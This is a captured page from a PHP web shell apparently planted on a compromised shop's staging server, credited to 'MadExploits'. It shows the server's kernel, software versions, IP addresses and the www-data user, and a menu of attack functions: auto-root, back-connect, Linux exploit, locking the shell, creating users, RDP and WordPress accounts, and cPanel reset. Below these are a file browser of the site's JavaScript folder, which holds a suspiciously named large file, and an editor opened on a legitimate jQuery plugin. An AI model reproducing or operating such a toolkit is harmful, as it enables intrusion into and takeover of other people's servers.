Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.18
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
staging.cbdpackaginghub.com /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap
[ DIR ]
drwxr-xr-x
feather
[ DIR ]
drwxr-xr-x
slick
[ DIR ]
drwxr-xr-x
apexchart.js
930.13
KB
-rw-r--r--
appear.js
4.13
KB
-rw-r--r--
auto-height.js
1.22
KB
-rw-r--r--
bootstrap.min.js
58.68
KB
-rw-r--r--
bxslider.js
23.68
KB
-rw-r--r--
clipboard.min.js
19.24
KB
-rw-r--r--
copy-clipboard.js
308
B
-rw-r--r--
custom-chart.js
12.9
KB
-rw-r--r--
custom-slick-animated.js
240
B
-rw-r--r--
custom-wow.js
84
B
-rw-r--r--
delivery-option.js
263
B
-rw-r--r--
filter-sidebar.js
432
B
-rw-r--r--
fly-cart.js
1.19
KB
-rw-r--r--
ion.rangeSlider.min.js
81.4
KB
-rw-r--r--
jquery-3.6.0.min.js
147.74
KB
-rw-r--r--
jquery-ui.js
447.08
KB
-rw-r--r--
jquery-ui.min.js
367.67
KB
-rw-r--r--
jquery.countdown.js
4.41
KB
-rw-r--r--
jquery.elevatezoom.js
37.71
KB
-rw-r--r--
jquery.fancybox.js
150.49
KB
-rw-r--r--
jquery.form.min.js
16.69
KB
-rw-r--r--
jquery.js
87.56
KB
-rw-r--r--
jquery.validate.min.js
24.02
KB
-rw-r--r--
lazysizes.min.js
12.9
KB
-rw-r--r--
lusqsztk.js
560.49
KB
-rw-r--r--
main-slider-script.js
2.88
KB
-rw-r--r--
mixitup.js
51
KB
-rw-r--r--
nav-tab.js
238
B
-rw-r--r--
otp.js
1.25
KB
-rw-r--r--
owl.carousel.min.js
42.92
KB
-rw-r--r--
owl.js
83.3
KB
-rw-r--r--
popper.min.js
18.16
KB
-rw-r--r--
quantity-2.js
974
B
-rw-r--r--
quantity.js
396
B
-rw-r--r--
script.js
10.06
KB
-rw-r--r--
select2.min.js
69.23
KB
-rw-r--r--
sticky-cart-bottom.js
363
B
-rw-r--r--
swiper.min.js
135.25
KB
-rw-r--r--
table-column-remove.js
190
B
-rw-r--r--
theme-setting.js
1.51
KB
-rw-r--r--
timer1.js
2.49
KB
-rw-r--r--
timer2.js
2.49
KB
-rw-r--r--
timer3.js
2.49
KB
-rw-r--r--
timer4.js
2.49
KB
-rw-r--r--
wizard.js
841
B
-rw-r--r--
wow.js
6.15
KB
-rw-r--r--
wow.min.js
14.34
KB
-rw-r--r--
zoom-filter.js
880
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.countdown.js
/*! * The Final Countdown for jQuery v2.0.4 (http://hilios.github.io/jQuery.countdown/) * Copyright (c) 2014 Edson Hilios * * Permission is hereby granted, free of charge, to any person obtaining a copy of * this software and associated documentation files (the "Software"), to deal in * the Software without restriction, including without limitation the rights to * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of * the Software, and to permit persons to whom the Software is furnished to do so, * subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER * IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ !function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):t(jQuery)}(function(t){"use strict";var e=[],s=[];s.push(/^[0-9]*$/.source),s.push(/([0-9]{1,2}\/){2}[0-9]{4}( [0-9]{1,2}(:[0-9]{2}){2})?/.source),s.push(/[0-9]{4}([\/\-][0-9]{1,2}){2}( [0-9]{1,2}(:[0-9]{2}){2})?/.source),s=new RegExp(s.join("|"));var n={Y:"years",m:"months",w:"weeks",d:"days",D:"totalDays",H:"hours",M:"minutes",S:"seconds"};function i(t,e){var s="s",n="";return t&&(1===(t=t.replace(/(:|;|\s)/gi,"").split(/\,/)).length?s=t[0]:(n=t[0],s=t[1])),1===Math.abs(e)?n:s}var a=function(s,n,i){this.el=s,this.$el=t(s),this.interval=null,this.offset={},this.instanceNumber=e.length,e.push(this),this.$el.data("countdown-instance",this.instanceNumber),i&&(this.$el.on("update.countdown",i),this.$el.on("stoped.countdown",i),this.$el.on("finish.countdown",i)),this.setFinalDate(n),this.start()};t.extend(a.prototype,{start:function(){null!==this.interval&&clearInterval(this.interval);var t=this;this.update(),this.interval=setInterval(function(){t.update.call(t)},100)},stop:function(){clearInterval(this.interval),this.interval=null,this.dispatchEvent("stoped")},pause:function(){this.stop.call(this)},resume:function(){this.start.call(this)},remove:function(){this.stop(),e[this.instanceNumber]=null,delete this.$el.data().countdownInstance},setFinalDate:function(t){this.finalDate=function(t){if(t instanceof Date)return t;if(String(t).match(s))return String(t).match(/^[0-9]*$/)&&(t=Number(t)),String(t).match(/\-/)&&(t=String(t).replace(/\-/g,"/")),new Date(t);throw new Error("Couldn't cast `"+t+"` to a date object.")}(t)},update:function(){0!==this.$el.closest("html").length?(this.totalSecsLeft=this.finalDate.getTime()-(new Date).getTime(),this.totalSecsLeft=Math.ceil(this.totalSecsLeft/1e3),this.totalSecsLeft=this.totalSecsLeft<0?0:this.totalSecsLeft,this.offset={seconds:this.totalSecsLeft%60,minutes:Math.floor(this.totalSecsLeft/60)%60,hours:Math.floor(this.totalSecsLeft/60/60)%24,days:Math.floor(this.totalSecsLeft/60/60/24)%7,totalDays:Math.floor(this.totalSecsLeft/60/60/24),weeks:Math.floor(this.totalSecsLeft/60/60/24/7),months:Math.floor(this.totalSecsLeft/60/60/24/30),years:Math.floor(this.totalSecsLeft/60/60/24/365)},0===this.totalSecsLeft?(this.stop(),this.dispatchEvent("finish")):this.dispatchEvent("update")):this.remove()},dispatchEvent:function(e){var s,a=t.Event(e+".countdown");a.finalDate=this.finalDate,a.offset=t.extend({},this.offset),a.strftime=(s=this.offset,function(t){var e=t.match(/%(-|!)?[A-Z]{1}(:[^;]+;)?/gi);if(e)for(var a=0,o=e.length;a<o;++a){var h=e[a].match(/%(-|!)?([a-zA-Z]{1})(:[^;]+;)?/),r=new RegExp(h[0]),l=h[1]||"",c=h[3]||"",f=null;h=h[2],n.hasOwnProperty(h)&&(f=n[h],f=Number(s[f])),null!==f&&("!"===l&&(f=i(c,f)),""===l&&f<10&&(f="0"+f.toString()),t=t.replace(r,f.toString()))}return t=t.replace(/%%/,"%")}),this.$el.trigger(a)}}),t.fn.countdown=function(){var s=Array.prototype.slice.call(arguments,0);return this.each(function(){var n=t(this).data("countdown-instance");if(void 0!==n){var i=e[n],o=s[0];a.prototype.hasOwnProperty(o)?i[o].apply(i,s.slice(1)):null===String(o).match(/^[$A-Z_][0-9A-Z_$]*$/i)?(i.setFinalDate.call(i,o),i.start()):t.error("Method %s does not exist on jQuery.countdown".replace(/\%s/gi,o))}else new a(this,s[0],s[1])})}});
Close